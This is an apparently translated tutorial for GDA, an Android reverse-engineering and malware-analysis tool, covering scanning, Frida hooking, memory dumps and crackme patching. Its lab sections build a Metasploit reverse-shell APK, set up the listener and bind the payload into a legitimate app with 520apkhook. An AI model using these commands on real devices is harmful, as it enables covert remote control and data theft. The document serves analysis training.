Introduction

This article briefly introduces how to use each function of GDA from a case study perspective.

Note: For an in-depth description of each function point, please visit the Analysis Wizard section of the website.

Update date: 31 July 2023

Welcome to join the slack channel for an exchange of ideas around GDA use and Android reverse engineering.

Environment Configuration

Configuration interface

图片

Configuration Wizard

After selecting a configuration, move the mouse pointer to the left side of the blank space will pop up the configuration prompt information

图片

python:

Note: Current GDA (4.08) requires 32-bit python, example

Python 2.7.18 https://www.python.org/ftp/python/2.7.18/python-2.7.18.msi

java :

java8:jdk-8u371-windows-i586

https://www.oracle.com/cn/java/technologies/downloads/#java8-windows

图片

Generate key

1
keytool -genkey -v -keystore app.keystore -alias gundam_wing -keyalg RSA -validity 20000

Convert key format

1
keytool -importkeystore -srckeystore app.keystore -destkeystore tmp.p12 -srcstoretype JKS -deststoretype PKCS12

Dump PKCS12-formatted key into directly readable text
openssl pkcs12 -in tmp.p12 -nodes -out tmp.rsa.pem

gedit tmp.rsa.pem

Extract the content within the text and create two files based on the flagging information of their content, example:

my_private.rsa.pem

图片

my.x509.pem

图片

Conversion to generate a private key in pk8 format

openssl pkcs8 -topk8 -outform DER -in my_private.rsa.pem -inform PEM -out my_private.pk8 -nocrypt

图片

Demo APK information

Sample code from Android studio: Hello Android

图片

running effect

图片

Authority to apply

图片

Malicious Information Scanning

图片

A number of methods were found to exist that could be used maliciously, for example:

Read contacts, SMS or other information

Collect IMEI, phone number, system version, etc

Example: Viewing and Locating

图片

Code displayed by GDA to assist analysis to source code related location

(Name Nearby code, location and other reference data)

图片

Malicious APK

On a kali system, you can generate an APK with a reflective shell by entering the following command

1
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.70.133 lport=55555 R > shell.apk

图片
图片

Attack aircraft listening in

1
2
3
4
5
6
msfconsole //Start msfconsole
use exploit/multi/handler //Load Modules
set payload android/meterpreter/reverse_tcp //Select Payload
set lhost 192.168.70.133 //The address here is set to the IP address of the Trojan we just generated.
set lport 55555
exploit //Start executing the exploit. Start listening and wait for the apk to run.

Listening in
图片

After installing and running the APK

图片

图片

图片

Getting information about the target device

1
sysinfo   //Getting device information

图片

Analysis of ideas

Basic Information Enquiry

  • BaseInfo
    You can see some basic information about the target APK in the BaseInfo module.

图片

  • Certificate Information
    You can query the certificate information by clicking on the function buttons or find the relevant query options in the map menu.

图片

  • AndroidManifest.xml file
    Can filter the content display, for example: services, see this apk can service state running (Service is a kind of application components can be in the background to perform a long time running operation without providing interface. Services can be started by other application components and will continue to run in the background even if the user switches to another application.)

图片

  • forensic information
    Unpack the APK and select the encoding format to check the information.

图片

  • Running status detection
    You can use adb shell “ps |grep package name” to query the current APK of the test device.

According to the APK package name query example query as follows: enter adb shell “ps |grep com.metasploit.stage” command to query the current test device APK is running.

The test APK is running as shown below

图片

Malicious Behaviour Scanning

图片

HTTP Connection

The malicious method line can be double-clicked to go to the relevant code page.

For example, if you click on the

图片

Analyse the code, the part related to the network protocol (serverSocket), through the startWith method to determine whether the string variable data to comply with the rules, if it meets the rules: if the string starts with tcp, then the string will be split by “:”.

图片

And will be split after the results of the serial number 2 part passed to a variable will be used as a port number value, and in the split value passed to a variable will be used as an IP, if the conditions are met, will create a ServerSocket object in the specified ip, the port to listen to, the key parameters from Payload.a

Type the shortcut key to search: Ctrl F

图片

See the assignment statement, click to view the

图片

Viewed the IP and port information for the reverse connection

图片

1
Payload.a = new byte[8196]{0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,':',0x09,0x00,'<','*',0x88,0x08,'.',0x12,0xdc,0xf8,'=',0xda,'>',0xc9,'Y',0xbd,'+','7','>',0xfd,0xc5,0xf9,0xd5,0xf6,'L','?',0x93,0xec,0xb5,'g',0x05,0xb6,0xb3,0xf2,'t','c','p',':','/','/','1','9','2','.','1','6','8','.','7','0','.','1','3','3',':','5','5','5','5','5',.....0x00,0x00,0x00,0x00,0x00,0x00,0x00};

Additional Tips:
Description of global search parameters

Type —-.

图片

refstr: search for strings (with quoted strings)

reffield: search for class variables (variables that are referenced).

method: search for methods

class: search for class names

field: global search for class variables

package: package search

图片

bin:binary search

Content—-

fuzzy :Payload

图片

precisely:”Payload”

图片

regular:~”.Payload.

图片

Window Always Display Options

图片

Frida Dynamic Debugging

HTTP Connection related

To run the Android device (here I am running the Android emulator on the existent GDA machine)

Right click on the following functions

图片

You can see the current machine’s Frida version in a pop-up window.

图片

Message: The Android device is not running frida-server.

Use GDACMD to enter the following command to query the Android device kernel version information:

1
adb shell getprop ro.product.cpu.abi

图片

Download the relevant frida-server based on the content information of frida and Android devices.

图片

Extracted files

图片

Enter the following command to copy this file to the /data/local/tmp/ directory on your Android device and rename it frida-server

1
adb push frida-server-16.0.19-android-x86_64 /data/local/tmp/frida-server

图片

You can start frida-server by entering the following command

Note: su is for switching to root privileges.

1
2
3
4
5
6
7
8
adb shell
su
cd /data/local/tmp
chmod 755 frida-server
./frida-server

nohup ./frida-server &  
#Runs in the background and doesn't shut down even if you shut down Terminal Services

图片

图片

  • Custom JS Scripts
    Left Right Execute or Shortcut F5

图片

Scripting

Viewing the introduction information

图片

String java class

startsWith method

图片

1
2
3
4
5
6
7
8
9
10
11
12
13
setImmediate(function() {
Java.perform(function(){
    var Stringg = Java.use("java.lang.String");
    console.log("Waiting for APP permission")
    console.log("Waiting for APP permission")
    Stringg.startsWith.overload('java.lang.String').implementation=function(test){
        console.log("----------Record TCP or HTTPS information:----------")
        console.log(this)
        var reval = this.startsWith(test)
        return reval
    }
})
})

图片

In the right window, right-click and select the Exit option to end the script execution.

图片

This concludes the simple dynamic analysis

Bundle Hardened APK Analysis

Bundling and Hardening with the 520apkhook Tool

Note: Need to change the source code due to utils naming conflicts.

图片

main.py

图片

1
python main.py --lhost 192.168.70.133 --lport 55555 -n ./test.apk

图片

Malscan comparative

original:test.apk

图片

图片
图片

bundled:AllFinish.apk

图片
图片

图片

图片

Comparison: Malicious scanning found added file manipulation methods and many more files in the apk package

Memory export

Application Scenario: Dump memory data for analysis when APK is hardened.

  • adb utility settings
    To avoid the execution of the recommended settings are as follows: environment variable adb use gdatmp directory, if the test device is a simulator (you need to delete the simulator comes with adb, use gdatmp directory adb replacement)

Note: gdatmp directory can be in the GDA does not open the apk when the map interface click on the working directory to quickly navigate to, if you have opened the apk in the navigation of the directory need to return to the previous directory to view!

test:

图片

As shown in the figure below: the right-hand area has the data output content

图片

  • Dump error condition
    If it is not available, you can manually upload the Memory Dump tool to the Android device (normally it is uploaded automatically).

The Memory Dump tool is saved in the gdatmp folder in the GDA working directory.

图片

Select the corresponding version to upload to the Android device according to its kernel and give the corresponding permissions Example:

Delete the Gdump file in the /data/local/tmp/ directory of the Android device

1
2
adb push %APPDATA%\GDA\gdatmp\Gdumpx86_64 /data/local/tmp/Gdump
adb shell chmod 777 /data/local/tmp/Gdump

test
图片

Dump Successful Alert Window

图片

Clicking OK will open the path where the dump file is saved in Explorer.

图片

Running Scripts

python script

test script

1.py

1
2
3
4
5
6
7
8
def GDA_MAIN(gda_obj):
    per='The apk permission:\n'
    per+=gda_obj.GetPermission()
    gda_obj.log(per)
    tofile = open('out.txt','w')
    tofile.write(per)
    tofile.close()
    return 0

Changes to the interface after running and outputting out.txt and 1.pyc files
图片
图片

java script

test script

1.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
package example;
import com.gda.api.GDAInterface;
import com.gda.api.GdaDex;
import com.gda.api.MethodInfo;
import com.gda.api.DexHeader;
//gjden
//example of dumping all the callors of a method
class Example4Callor {
	public int GDA_MAIN(GDAInterface gda)
	{
		String callorStr="";
		GdaDex Dex0=gda.DexList.get(0);
		for (MethodInfo method:Dex0.MethodList){
			if(method!=null&&method.callorIdxList.length>5){
				callorStr=String.format("the [%d] callors of the method: %s\n\n",method.callorIdxList.length,method.methodFullName);
				for (int calloridx:method.callorIdxList){
					String index=""+calloridx;
					if (Dex0.MethodTable.containsKey(index)){
						MethodInfo obj=Dex0.MethodTable.get(index);
                        callorStr+=obj.methodFullName;
						callorStr+=obj.MethodSignature;
						callorStr+="\n";
					}
				}
				break;
			}
		}
		gda.log(callorStr);
		return 0;
	}
}

If you load .java directly, the following window will pop up
图片

Loading compiled class files

图片

The relevant scripts can be viewed at the GitHub project https://github.com/charles2gan/GDA-android-reversing-Tool

Application Cases

Modify file

test file:https://github.com/num1r0/android_crackmes

After loading the test file, click Enter to enter the entry area.

图片

Double click on MainActivity$1 with the left mouse button to enter the MainActivity area

图片

Double-click getFlag with the left mouse button

图片

1.View related information: double-click GETDATA with the left mouse button

图片

s3cr37_p4ssw0rd_1337

图片

图片

2.Modify judgment: F5 or right click on Smali Java in the function window that pops up

图片

Smali code

图片

  • NOP modification
    图片

图片

Press R to save the changes

Click OK to install the modified APK to the test device

图片

Successful installation message

图片

running test

图片

  • modify a command
    图片

Modify if-eqz to if-nez

Right-click to see a menu of related functions

图片

Press M to modify the currently selected command

图片

Press Enter to confirm the modification.

图片

Press R to save changes and test

图片

This article ends here.